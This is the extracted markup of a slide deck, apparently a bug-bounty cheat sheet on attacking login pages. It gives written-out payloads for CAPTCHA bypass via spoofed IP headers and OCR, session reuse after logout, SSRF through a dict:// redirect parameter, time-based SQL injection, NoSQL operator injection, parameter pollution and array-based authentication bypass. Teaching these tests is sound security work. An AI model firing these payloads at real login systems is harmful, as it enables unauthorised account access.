              <a:t>To Bypass Captcha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22" name="Google Shape;622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/logIn?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X-Originating-IP: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X-Client-IP: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X-Remote-IP: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X-Remote-Addr: 127.0.0.1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user=me&amp;password=****&amp;captcha=Random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23" name="Google Shape;623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4" name="Google Shape;624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6" name="Google Shape;62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8" name="Google Shape;62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4" name="Google Shape;634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6" name="Google Shape;636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Company</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Uses Captcha Image </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contains</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Text</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Convert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Command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Tesseract Tool </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Extract The Text From The Image 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37" name="Google Shape;63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Download The Image , Called e.g. img.png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convert img.png -colorspace gray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-threshold 50% imgOUT.png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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tesseract imgOUT.png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9" name="Google Shape;639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0" name="Google Shape;64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6" name="Google Shape;646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48" name="Google Shape;648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Is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>app.com Use HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Instead Of HTTPS In log In e.g. http://app.com/login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49" name="Google Shape;64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Company used `HTTP Instead Of HTTPS` In Log In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http://app.com/login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Are Email AND Password In clear text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651" name="Google Shape;65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8" name="Google Shape;658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60" name="Google Shape;660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Figure Out If The Session Will Expire</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> After Logging Out OR Not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661" name="Google Shape;6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Log In Browser e.g. Chrome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Copy The Session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Log Out From Chrome Browser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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Use The Copy Session In Browser e.g. Firefox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63" name="Google Shape;663;p7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4" name="Google Shape;66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2" name="Google Shape;672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4" name="Google Shape;674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Log</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Out </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, And</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Insert dict://me.com:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If There Is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redirect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After Log Out e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> logout_path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5" name="Google Shape;67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/logout?logout_path=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dict://me.com:80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7" name="Google Shape;677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8" name="Google Shape;67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8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8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5" name="Google Shape;685;p78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86" name="Google Shape;68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8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8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8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SQLi Payloads e.g </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>";WAITFOR DELAY '0.0.20'--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'/**/or/**/abc!='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In Username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Password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Parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get SQLi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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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";WAITFOR DELAY '0.0.20'--</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>";WAITFOR DELAY '0.0.20'--</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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[%24ne] In Email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Password Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Log In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email=me@gmail.com&amp;pass</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[%24ne]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&amp;captcha=Random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75" y="3013450"/>
            <a:ext cx="467525" cy="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&amp;gt In Password Parameter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change Content Type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Header To application/json </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Log In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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/json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{'user':'me',</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'pass': {'&amp;gt':' '}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,'captcha':'Random'}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75" y="3013450"/>
            <a:ext cx="467525" cy="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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nameOfparameter[ ] In Email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Password Parameter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OverWrite Value Of The Parameter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email[ ]=me@gmail.com&amp;email[ ]=victim@gmail.com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pass=********&amp;captcha=Random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75" y="3013450"/>
            <a:ext cx="467525" cy="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Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_all_docs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user[ ]=_all_docs In User Parameter With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Undefined Password </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Log In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2" name="Google Shape;292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Accept-Encoding: gzip, deflate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user=_all_docs</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;captcha=Random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75" y="3013450"/>
            <a:ext cx="467525" cy="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 Body Of Request Is Json , Try To Log In By </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Multiple Usernames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At The Same Time</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Cause Error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/logIn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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>["userONE","userTWO"]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,"password":"************",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"captcha":"Random"}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